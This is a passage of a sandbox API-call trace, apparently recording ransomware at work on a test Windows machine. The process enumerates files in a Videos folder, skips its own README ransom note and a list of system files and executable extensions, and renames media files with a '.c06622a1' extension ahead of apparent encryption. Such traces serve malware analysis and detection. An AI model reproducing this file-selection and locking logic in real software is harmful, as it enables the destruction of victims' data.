dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0168.311] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.311] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x38c0020 [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d04d1fd [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71645ee8 [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40a16b5d [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23c8c9fd [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d76b935 [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1876abda [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5106c7e9 [0168.318] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24a4c204 [0168.321] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x38c0094, Length=0x80) returned 0x9c691e24 [0168.321] RtlComputeCrc32 (PartialCrc=0x1e24, Buffer=0x38c0094, Length=0x80) returned 0x1ac4814 [0168.321] RtlComputeCrc32 (PartialCrc=0x4814, Buffer=0x38c0094, Length=0x80) returned 0xde990e4c [0168.322] RtlComputeCrc32 (PartialCrc=0xe4c, Buffer=0x38c0094, Length=0x80) returned 0x7ec76391 [0168.322] RtlComputeCrc32 (PartialCrc=0x6391, Buffer=0x38c0094, Length=0x80) returned 0xf9aa9e41 [0168.322] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x38c0020) returned 1 [0168.322] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.322] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.322] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf84bdc30, ftCreationTime.dwHighDateTime=0x1d5df70, ftLastAccessTime.dwLowDateTime=0x68ac7770, ftLastAccessTime.dwHighDateTime=0x1d5e41f, ftLastWriteTime.dwLowDateTime=0x68ac7770, ftLastWriteTime.dwHighDateTime=0x1d5e41f, nFileSizeHigh=0x0, nFileSizeLow=0x84a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="O-30P.swf", cAlternateFileName="")) returned 1 [0168.322] _wcsicmp (_Str1="O-30P.swf", _Str2="README.c06622a1.TXT") returned -3 [0168.322] wcsstr (_Str="O-30P.swf", _SubStr="README") returned 0x0 [0168.322] _wcsicmp (_Str1="autorun.inf", _Str2="O-30P.swf") returned -14 [0168.322] wcslen (_String="autorun.inf") returned 0xb [0168.322] _wcsicmp (_Str1="boot.ini", _Str2="O-30P.swf") returned -13 [0168.322] wcslen (_String="boot.ini") returned 0x8 [0168.322] _wcsicmp (_Str1="bootfont.bin", _Str2="O-30P.swf") returned -13 [0168.322] wcslen (_String="bootfont.bin") returned 0xc [0168.322] _wcsicmp (_Str1="bootsect.bak", _Str2="O-30P.swf") returned -13 [0168.322] wcslen (_String="bootsect.bak") returned 0xc [0168.322] _wcsicmp (_Str1="desktop.ini", _Str2="O-30P.swf") returned -11 [0168.322] wcslen (_String="desktop.ini") returned 0xb [0168.322] _wcsicmp (_Str1="iconcache.db", _Str2="O-30P.swf") returned -6 [0168.322] wcslen (_String="iconcache.db") returned 0xc [0168.322] _wcsicmp (_Str1="ntldr", _Str2="O-30P.swf") returned -1 [0168.322] wcslen (_String="ntldr") returned 0x5 [0168.322] _wcsicmp (_Str1="ntuser.dat", _Str2="O-30P.swf") returned -1 [0168.322] wcslen (_String="ntuser.dat") returned 0xa [0168.322] _wcsicmp (_Str1="ntuser.dat.log", _Str2="O-30P.swf") returned -1 [0168.322] wcslen (_String="ntuser.dat.log") returned 0xe [0168.322] _wcsicmp (_Str1="ntuser.ini", _Str2="O-30P.swf") returned -1 [0168.322] wcslen (_String="ntuser.ini") returned 0xa [0168.322] _wcsicmp (_Str1="thumbs.db", _Str2="O-30P.swf") returned 5 [0168.322] wcslen (_String="thumbs.db") returned 0x9 [0168.322] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0168.323] wcslen (_String="386") returned 0x3 [0168.323] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0168.323] wcslen (_String="adv") returned 0x3 [0168.323] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0168.323] wcslen (_String="ani") returned 0x3 [0168.323] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0168.323] wcslen (_String="bat") returned 0x3 [0168.323] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0168.323] wcslen (_String="bin") returned 0x3 [0168.323] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0168.323] wcslen (_String="cab") returned 0x3 [0168.323] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0168.323] wcslen (_String="cmd") returned 0x3 [0168.323] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0168.323] wcslen (_String="com") returned 0x3 [0168.323] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0168.323] wcslen (_String="cpl") returned 0x3 [0168.323] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0168.323] wcslen (_String="cur") returned 0x3 [0168.323] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0168.323] wcslen (_String="deskthemepack") returned 0xd [0168.323] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0168.323] wcslen (_String="diagcab") returned 0x7 [0168.323] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0168.323] wcslen (_String="diagcfg") returned 0x7 [0168.323] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0168.323] wcslen (_String="diagpkg") returned 0x7 [0168.323] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0168.323] wcslen (_String="dll") returned 0x3 [0168.323] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0168.323] wcslen (_String="drv") returned 0x3 [0168.323] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0168.323] wcslen (_String="exe") returned 0x3 [0168.323] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0168.323] wcslen (_String="hlp") returned 0x3 [0168.323] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0168.323] wcslen (_String="icl") returned 0x3 [0168.324] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0168.324] wcslen (_String="icns") returned 0x4 [0168.324] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0168.324] wcslen (_String="ico") returned 0x3 [0168.324] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0168.324] wcslen (_String="ics") returned 0x3 [0168.324] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.324] wcslen (_String="idx") returned 0x3 [0168.324] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.324] wcslen (_String="ldf") returned 0x3 [0168.324] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.324] wcslen (_String="lnk") returned 0x3 [0168.324] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.324] wcslen (_String="mod") returned 0x3 [0168.324] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.324] wcslen (_String="mpa") returned 0x3 [0168.324] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.324] wcslen (_String="msc") returned 0x3 [0168.324] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.324] wcslen (_String="msp") returned 0x3 [0168.324] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.324] wcslen (_String="msstyles") returned 0x8 [0168.324] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.324] wcslen (_String="msu") returned 0x3 [0168.324] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.324] wcslen (_String="nls") returned 0x3 [0168.324] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.324] wcslen (_String="nomedia") returned 0x7 [0168.324] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.324] wcslen (_String="ocx") returned 0x3 [0168.324] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.324] wcslen (_String="prf") returned 0x3 [0168.324] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.324] wcslen (_String="ps1") returned 0x3 [0168.325] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.325] wcslen (_String="rom") returned 0x3 [0168.325] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.325] wcslen (_String="rtp") returned 0x3 [0168.325] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.325] wcslen (_String="scr") returned 0x3 [0168.325] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.325] wcslen (_String="shs") returned 0x3 [0168.325] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.325] wcslen (_String="spl") returned 0x3 [0168.325] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.325] wcslen (_String="sys") returned 0x3 [0168.325] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.325] wcslen (_String="theme") returned 0x5 [0168.325] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.325] wcslen (_String="themepack") returned 0x9 [0168.325] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.325] wcslen (_String="wpx") returned 0x3 [0168.325] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.325] wcslen (_String="lock") returned 0x4 [0168.325] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.325] wcslen (_String="key") returned 0x3 [0168.325] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.325] wcslen (_String="hta") returned 0x3 [0168.325] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.325] wcslen (_String="msi") returned 0x3 [0168.325] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.325] wcslen (_String="pdb") returned 0x3 [0168.325] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.325] wcslen (_String="sqlite") returned 0x6 [0168.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.326] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.326] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.326] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.326] wcscpy (in: _Dest=0x32400d2, _Source="O-30P.swf" | out: _Dest="O-30P.swf") returned="O-30P.swf" [0168.326] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf", dwFileAttributes=0x80) returned 1 [0168.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\o-30p.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0168.326] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.326] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.327] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x90a6ba18 [0168.327] RtlComputeCrc32 (PartialCrc=0xba18, Buffer=0x32e9a4, Length=0x80) returned 0xc61044d4 [0168.327] RtlComputeCrc32 (PartialCrc=0x44d4, Buffer=0x32e9a4, Length=0x80) returned 0xa74d196a [0168.327] RtlComputeCrc32 (PartialCrc=0x196a, Buffer=0x32e9a4, Length=0x80) returned 0xb2f594a8 [0168.327] RtlComputeCrc32 (PartialCrc=0x94a8, Buffer=0x32e9a4, Length=0x80) returned 0xcf92838 [0168.327] CloseHandle (hObject=0x1e4) returned 1 [0168.327] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.327] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf" [0168.327] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf") returned 0x42 [0168.327] wcscpy (in: _Dest=0x32500ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.327] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\o-30p.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\o-30p.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\O-30P.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\o-30p.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0168.330] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.330] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3950020 [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x67f5933a [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6a905619 [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x681e321f [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68fdc5bf [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57d63b8c [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55ed8902 [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d4188ef [0168.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fd878a2 [0168.340] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3950094, Length=0x80) returned 0xce523925 [0168.340] RtlComputeCrc32 (PartialCrc=0x3925, Buffer=0x3950094, Length=0x80) returned 0x4a06acb1 [0168.340] RtlComputeCrc32 (PartialCrc=0xacb1, Buffer=0x3950094, Length=0x80) returned 0x4ae8b97d [0168.340] RtlComputeCrc32 (PartialCrc=0xb97d, Buffer=0x3950094, Length=0x80) returned 0x67bc48bd [0168.341] RtlComputeCrc32 (PartialCrc=0x48bd, Buffer=0x3950094, Length=0x80) returned 0xb1eced48 [0168.341] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3950020) returned 1 [0168.341] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.341] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.341] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91ef8960, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91ef8960, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91ef8960, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0168.341] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0168.341] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x547be120, ftCreationTime.dwHighDateTime=0x1d5dab8, ftLastAccessTime.dwLowDateTime=0x8a5ee3d0, ftLastAccessTime.dwHighDateTime=0x1d5df06, ftLastWriteTime.dwLowDateTime=0x8a5ee3d0, ftLastWriteTime.dwHighDateTime=0x1d5df06, nFileSizeHigh=0x0, nFileSizeLow=0xbc8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="rukKt9s_dMef3uJS.mp4", cAlternateFileName="RUKKT9~1.MP4")) returned 1 [0168.341] _wcsicmp (_Str1="rukKt9s_dMef3uJS.mp4", _Str2="README.c06622a1.TXT") returned 16 [0168.341] wcsstr (_Str="rukKt9s_dMef3uJS.mp4", _SubStr="README") returned 0x0 [0168.341] _wcsicmp (_Str1="autorun.inf", _Str2="rukKt9s_dMef3uJS.mp4") returned -17 [0168.341] wcslen (_String="autorun.inf") returned 0xb [0168.341] _wcsicmp (_Str1="boot.ini", _Str2="rukKt9s_dMef3uJS.mp4") returned -16 [0168.341] wcslen (_String="boot.ini") returned 0x8 [0168.341] _wcsicmp (_Str1="bootfont.bin", _Str2="rukKt9s_dMef3uJS.mp4") returned -16 [0168.341] wcslen (_String="bootfont.bin") returned 0xc [0168.341] _wcsicmp (_Str1="bootsect.bak", _Str2="rukKt9s_dMef3uJS.mp4") returned -16 [0168.341] wcslen (_String="bootsect.bak") returned 0xc [0168.341] _wcsicmp (_Str1="desktop.ini", _Str2="rukKt9s_dMef3uJS.mp4") returned -14 [0168.341] wcslen (_String="desktop.ini") returned 0xb [0168.341] _wcsicmp (_Str1="iconcache.db", _Str2="rukKt9s_dMef3uJS.mp4") returned -9 [0168.341] wcslen (_String="iconcache.db") returned 0xc [0168.341] _wcsicmp (_Str1="ntldr", _Str2="rukKt9s_dMef3uJS.mp4") returned -4 [0168.341] wcslen (_String="ntldr") returned 0x5 [0168.341] _wcsicmp (_Str1="ntuser.dat", _Str2="rukKt9s_dMef3uJS.mp4") returned -4 [0168.341] wcslen (_String="ntuser.dat") returned 0xa [0168.341] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rukKt9s_dMef3uJS.mp4") returned -4 [0168.341] wcslen (_String="ntuser.dat.log") returned 0xe [0168.341] _wcsicmp (_Str1="ntuser.ini", _Str2="rukKt9s_dMef3uJS.mp4") returned -4 [0168.341] wcslen (_String="ntuser.ini") returned 0xa [0168.342] _wcsicmp (_Str1="thumbs.db", _Str2="rukKt9s_dMef3uJS.mp4") returned 2 [0168.342] wcslen (_String="thumbs.db") returned 0x9 [0168.342] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.342] wcslen (_String="386") returned 0x3 [0168.342] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.342] wcslen (_String="adv") returned 0x3 [0168.342] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.342] wcslen (_String="ani") returned 0x3 [0168.342] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.342] wcslen (_String="bat") returned 0x3 [0168.342] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.342] wcslen (_String="bin") returned 0x3 [0168.342] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.342] wcslen (_String="cab") returned 0x3 [0168.342] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.342] wcslen (_String="cmd") returned 0x3 [0168.342] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.342] wcslen (_String="com") returned 0x3 [0168.342] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.342] wcslen (_String="cpl") returned 0x3 [0168.342] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.342] wcslen (_String="cur") returned 0x3 [0168.342] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.342] wcslen (_String="deskthemepack") returned 0xd [0168.342] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.342] wcslen (_String="diagcab") returned 0x7 [0168.342] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.342] wcslen (_String="diagcfg") returned 0x7 [0168.342] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.342] wcslen (_String="diagpkg") returned 0x7 [0168.342] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.342] wcslen (_String="dll") returned 0x3 [0168.343] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.343] wcslen (_String="drv") returned 0x3 [0168.343] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.343] wcslen (_String="exe") returned 0x3 [0168.343] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.343] wcslen (_String="hlp") returned 0x3 [0168.343] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.343] wcslen (_String="icl") returned 0x3 [0168.343] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.343] wcslen (_String="icns") returned 0x4 [0168.343] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.343] wcslen (_String="ico") returned 0x3 [0168.343] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.343] wcslen (_String="ics") returned 0x3 [0168.343] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.343] wcslen (_String="idx") returned 0x3 [0168.343] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.343] wcslen (_String="ldf") returned 0x3 [0168.343] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.343] wcslen (_String="lnk") returned 0x3 [0168.343] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.343] wcslen (_String="mod") returned 0x3 [0168.343] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.343] wcslen (_String="mpa") returned 0x3 [0168.343] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.343] wcslen (_String="msc") returned 0x3 [0168.343] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.343] wcslen (_String="msp") returned 0x3 [0168.343] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.343] wcslen (_String="msstyles") returned 0x8 [0168.343] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.343] wcslen (_String="msu") returned 0x3 [0168.343] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.344] wcslen (_String="nls") returned 0x3 [0168.344] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.344] wcslen (_String="nomedia") returned 0x7 [0168.344] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.344] wcslen (_String="ocx") returned 0x3 [0168.344] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.344] wcslen (_String="prf") returned 0x3 [0168.344] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.344] wcslen (_String="ps1") returned 0x3 [0168.344] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.344] wcslen (_String="rom") returned 0x3 [0168.344] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.344] wcslen (_String="rtp") returned 0x3 [0168.344] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.344] wcslen (_String="scr") returned 0x3 [0168.344] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.344] wcslen (_String="shs") returned 0x3 [0168.344] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.344] wcslen (_String="spl") returned 0x3 [0168.344] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.344] wcslen (_String="sys") returned 0x3 [0168.344] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.344] wcslen (_String="theme") returned 0x5 [0168.344] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.344] wcslen (_String="themepack") returned 0x9 [0168.344] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.344] wcslen (_String="wpx") returned 0x3 [0168.344] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.345] wcslen (_String="lock") returned 0x4 [0168.345] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.345] wcslen (_String="key") returned 0x3 [0168.345] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.345] wcslen (_String="hta") returned 0x3 [0168.345] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.345] wcslen (_String="msi") returned 0x3 [0168.345] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.345] wcslen (_String="pdb") returned 0x3 [0168.345] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.345] wcslen (_String="sqlite") returned 0x6 [0168.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.345] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.345] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.345] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.345] wcscpy (in: _Dest=0x32400d2, _Source="rukKt9s_dMef3uJS.mp4" | out: _Dest="rukKt9s_dMef3uJS.mp4") returned="rukKt9s_dMef3uJS.mp4" [0168.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4", dwFileAttributes=0x80) returned 1 [0168.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\rukKt9s_dMef3uJS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\rukkt9s_dmef3ujs.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0168.346] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.346] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.346] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc8f4ca49 [0168.347] 